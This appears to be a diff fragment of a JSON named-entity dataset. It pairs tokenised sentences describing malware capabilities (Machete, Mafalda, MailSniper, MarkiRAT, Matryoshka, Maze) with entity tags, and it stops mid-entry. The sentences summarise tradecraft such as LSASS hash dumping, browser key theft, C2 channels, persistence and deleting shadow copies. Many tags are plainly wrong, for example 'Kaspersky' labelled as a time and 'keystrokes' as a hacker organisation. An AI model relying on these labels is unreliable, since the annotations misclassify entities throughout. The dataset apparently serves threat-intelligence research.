"to", + "the", + "C2", + "server", + "every", + "10", + "minutes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "captures", + "screenshots." + ], + "ner_tags": [ + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "been", + "packed", + "with", + "NSIS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Machete", + "has", + "used", + "base64", + "encoding." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "used", + "AES", + "to", + "exfiltrate", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "collects", + "the", + "hostname", + "of", + "the", + "target", + "computer." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "collects", + "the", + "MAC", + "address", + "of", + "the", + "target", + "computer", + "and", + "other", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "uses", + "the", + "<code>netsh", + "wlan", + "show", + "networks", + "mode=bssid</code>", + "and", + "<code>netsh", + "wlan", + "show", + "interfaces</code>", + "commands", + "to", + "list", + "all", + "nearby", + "WiFi", + "networks", + "and", + "connected", + "interfaces." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "takes", + "photos", + "from", + "the", + "computer’s", + "web", + "camera." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "uses", + "HTTP", + "for", + "Command", + "&", + "Control." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "use", + "`AdjustTokenPrivileges()`", + "to", + "elevate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "collect", + "the", + "contents", + "of", + "the", + "`%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User", + "Data\\LocalState`", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "delete", + "Windows", + "Event", + "logs", + "by", + "invoking", + "the", + "`OpenEventLogW`", + "and", + "`ClearEventLogW`", + "functions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "collect", + "files", + "and", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "search", + "for", + "debugging", + "tools", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "decrypt", + "files", + "and", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "has", + "been", + "obfuscated", + "and", + "contains", + "encrypted", + "functions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "send", + "network", + "system", + "data", + "and", + "files", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "establish", + "an", + "SSH", + "connection", + "from", + "a", + "compromised", + "host", + "to", + "a", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "search", + "for", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "download", + "additional", + "files", + "onto", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "conduct", + "mouse", + "event", + "logging." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "create", + "a", + "named", + "pipe", + "to", + "listen", + "for", + "and", + "send", + "data", + "to", + "a", + "named", + "pipe-based", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "dump", + "password", + "hashes", + "from", + "`LSASS.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "place", + "retrieved", + "files", + "into", + "a", + "destination", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "create", + "a", + "token", + "for", + "a", + "different", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "manipulate", + "the", + "system", + "registry", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "use", + "a", + "variety", + "of", + "API", + "calls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "use", + "raw", + "TCP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "use", + "port-knocking", + "to", + "authenticate", + "itself", + "to", + "another", + "implant", + "called", + "Cryshell", + "to", + "establish", + "an", + "indirect", + "connection", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "execute", + "PowerShell", + "commands", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "collect", + "a", + "Chrome", + "encryption", + "key", + "used", + "to", + "protect", + "browser", + "cookies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "enumerate", + "running", + "processes", + "on", + "a", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "enumerate", + "Registry", + "keys", + "with", + "all", + "subkeys", + "and", + "values." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "take", + "a", + "screenshot", + "of", + "the", + "target", + "machine", + "and", + "save", + "it", + "to", + "a", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "search", + "for", + "a", + "variety", + "of", + "security", + "software", + "programs,", + "EDR", + "systems,", + "and", + "malware", + "analysis", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "create", + "a", + "remote", + "service,", + "let", + "it", + "run", + "once,", + "and", + "then", + "delete", + "it." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "encode", + "data", + "using", + "Base64", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "encrypt", + "its", + "C2", + "traffic", + "with", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "collect", + "the", + "computer", + "name", + "and", + "enumerate", + "all", + "drives", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "use", + "the", + "`GetAdaptersInfo`", + "function", + "to", + "retrieve", + "information", + "about", + "network", + "adapters", + "and", + "the", + "`GetIpNetTable`", + "function", + "to", + "retrieve", + "the", + "IPv4", + "to", + "physical", + "network", + "address", + "mapping", + "table." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "use", + "the", + "<code>GetExtendedTcpTable</code>", + "function", + "to", + "retrieve", + "information", + "about", + "established", + "TCP", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "collect", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "use", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Mafalda", + "can", + "execute", + "shell", + "commands", + "using", + "`cmd.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MailSniper", + "can", + "be", + "used", + "to", + "obtain", + "account", + "names", + "from", + "Exchange", + "and", + "Office", + "365", + "using", + "the", + "<code>Get-GlobalAddressList</code>", + "cmdlet." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MailSniper", + "can", + "be", + "used", + "for", + "password", + "spraying", + "against", + "Exchange", + "and", + "Office", + "365." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MailSniper", + "can", + "be", + "used", + "for", + "searching", + "through", + "email", + "in", + "Exchange", + "and", + "Office", + "365", + "environments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "use", + "BITS", + "Utility", + "to", + "connect", + "with", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "capture", + "clipboard", + "content." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "upload", + "data", + "from", + "the", + "victim's", + "machine", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "exfiltrate", + "locally", + "stored", + "data", + "via", + "its", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "look", + "for", + "files", + "carrying", + "specific", + "extensions", + "such", + "as:", + ".rtf,", + ".doc,", + ".docx,", + ".xls,", + ".xlsx,", + ".ppt,", + ".pptx,", + ".pps,", + ".ppsx,", + ".txt,", + ".gpg,", + ".pkr,", + ".kdbx,", + ".key,", + "and", + ".jpb." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "download", + "additional", + "files", + "and", + "tools", + "from", + "its", + "C2", + "server,", + "including", + "through", + "the", + "use", + "of", + "BITSAdmin." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "capture", + "all", + "keystrokes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "store", + "collected", + "data", + "locally", + "in", + "a", + "created", + ".nfo", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "masquerade", + "as", + "<code>update.exe</code>", + "and", + "<code>svehost.exe</code>;", + "it", + "has", + "also", + "mimicked", + "legitimate", + "Telegram", + "and", + "Chrome", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "run", + "the", + "ShellExecuteW", + "API", + "via", + "the", + "Windows", + "Command", + "Shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "gather", + "information", + "from", + "the", + "Keepass", + "password", + "manager." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "search", + "for", + "different", + "processes", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "drop", + "its", + "payload", + "into", + "the", + "Startup", + "directory", + "to", + "ensure", + "it", + "automatically", + "runs", + "when", + "the", + "compromised", + "system", + "is", + "started." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "capture", + "screenshots", + "that", + "are", + "initially", + "saved", + "as", + "‘scr.jpg’." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "check", + "for", + "running", + "processes", + "on", + "the", + "victim’s", + "machine", + "to", + "look", + "for", + "Kaspersky", + "and", + "Bitdefender", + "antivirus", + "products." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "modify", + "the", + "shortcut", + "that", + "launches", + "Telegram", + "by", + "replacing", + "its", + "path", + "with", + "the", + "malicious", + "payload", + "to", + "launch", + "with", + "the", + "legitimate", + "executable." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "check", + "for", + "the", + "Telegram", + "installation", + "directory", + "by", + "enumerating", + "the", + "files", + "on", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "obtain", + "the", + "computer", + "name", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "use", + "the", + "<code>GetKeyboardLayout</code>", + "API", + "to", + "check", + "if", + "a", + "compromised", + "host's", + "keyboard", + "is", + "set", + "to", + "Persian." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "retrieve", + "the", + "victim’s", + "username." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "initiate", + "communication", + "over", + "HTTP/HTTPS", + "for", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MarkiRAT", + "can", + "utilize", + "cmd.exe", + "to", + "execute", + "commands", + "in", + "a", + "victim's", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "is", + "capable", + "of", + "providing", + "Meterpreter", + "shell", + "access." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "is", + "capable", + "of", + "stealing", + "Outlook", + "passwords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Purp", + "B-Purp", + "B-Purp" + ] + }, + { + "tokens": [ + "Matryoshka", + "uses", + "DNS", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "uses", + "reflective", + "DLL", + "injection", + "to", + "inject", + "the", + "malicious", + "library", + "and", + "execute", + "the", + "RAT." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Matryoshka", + "is", + "capable", + "of", + "keylogging." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "obfuscates", + "API", + "function", + "names", + "using", + "a", + "substitute", + "cipher", + "combined", + "with", + "Base64", + "encoding." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "can", + "establish", + "persistence", + "by", + "adding", + "Registry", + "Run", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "uses", + "rundll32.exe", + "in", + "a", + "Registry", + "Run", + "key", + "value", + "for", + "execution", + "as", + "part", + "of", + "its", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "can", + "establish", + "persistence", + "by", + "adding", + "a", + "Scheduled", + "Task", + "named", + "\"Microsoft", + "Boost", + "Kernel", + "Optimization\"." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Matryoshka", + "is", + "capable", + "of", + "performing", + "screen", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "inserted", + "large", + "blocks", + "of", + "junk", + "code,", + "including", + "some", + "components", + "to", + "decrypt", + "strings", + "and", + "other", + "important", + "information", + "for", + "later", + "in", + "the", + "encryption", + "process." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "disrupted", + "systems", + "by", + "encrypting", + "files", + "on", + "targeted", + "machines,", + "claiming", + "to", + "decrypt", + "files", + "if", + "a", + "ransom", + "payment", + "is", + "made.", + "Maze", + "has", + "used", + "the", + "ChaCha", + "algorithm,", + "based", + "on", + "Salsa20,", + "and", + "an", + "RSA", + "algorithm", + "to", + "encrypt", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "disabled", + "dynamic", + "analysis", + "and", + "other", + "security", + "tools", + "including", + "IDA", + "debugger,", + "x32dbg,", + "and", + "OllyDbg.", + "It", + "has", + "also", + "disabled", + "Windows", + "Defender's", + "Real-Time", + "Monitoring", + "feature", + "and", + "attempted", + "to", + "disable", + "endpoint", + "protection", + "services." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "forged", + "POST", + "strings", + "with", + "a", + "random", + "choice", + "from", + "a", + "list", + "of", + "possibilities", + "including", + "\"forum\",", + "\"php\",", + "\"view\",", + "etc.", + "while", + "making", + "connection", + "with", + "the", + "C2,", + "hindering", + "detection", + "efforts." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "injected", + "the", + "malware", + "DLL", + "into", + "a", + "target", + "process." + ], + "ner_tags": [ + "B-Time", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "used", + "the", + "“Wow64RevertWow64FsRedirection”", + "function", + "following", + "attempts", + "to", + "delete", + "the", + "shadow", + "volumes,", + "in", + "order", + "to", + "leave", + "the", + "system", + "in", + "the", + "same", + "state", + "as", + "it", + "was", + "prior", + "to", + "redirection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "attempted", + "to", + "delete", + "the", + "shadow", + "volumes", + "of", + "infected", + "machines,", + "once", + "before", + "and", + "once", + "after", + "the", + "encryption", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "operators", + "have", + "created", + "scheduled", + "tasks", + "masquerading", + "as", + "\"Windows", + "Update", + "Security\",", + "\"Windows", + "Update", + "Security", + "Patches\",", + "and", + "\"Google", + "Chrome", + "Security", + "Update\"", + "designed", + "to", + "launch", + "the", + "ransomware." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "delivered", + "components", + "for", + "its", + "ransomware", + "attacks", + "using", + "MSI", + "files,", + "some", + "of", + "which", + "have", + "been", + "executed", + "from", + "the", + "command-line", + "using", + "<code>msiexec</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "used", + "several", + "Windows", + "API", + "functions", + "throughout", + "the", + "encryption", + "process", + "including", + "IsDebuggerPresent,", + "TerminateProcess,", + "Process32FirstW,", + "among", + "others." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "decrypted", + "strings", + "and", + "other", + "important", + "information", + "during", + "the", + "encryption", + "process.", + "Maze", + "also", + "calls", + "certain", + "functions", + "dynamically", + "to", + "hinder", + "analysis." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "gathered", + "all", + "of", + "the", + "running", + "system", + "processes." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "has", + "created", + "a", + "file", + "named", + "\"startup_vrun.bat\"", + "in", + "the", + "Startup", + "folder", + "of", + "a", + "virtual", + "machine", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Maze", + "operators", + "have", + "used", + "VirtualBox", + "and", + "a", + "Windows", + "7", + "virtual", + "machine", + "to", + "run", + "the", + "ransomware;", + "the", + "virtual", + "machine's", + "configuration", + "file", + "mapped", + "the", + "shared", + "network", + "drives", + "of", + "the", + "target", + "company,", + "presumably", + "so", + "Maze", + "can", + "encrypt", + "files", + "on", + "the", + "shared", + "drives", + "as", + "well", + "as", + "the", + "local", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 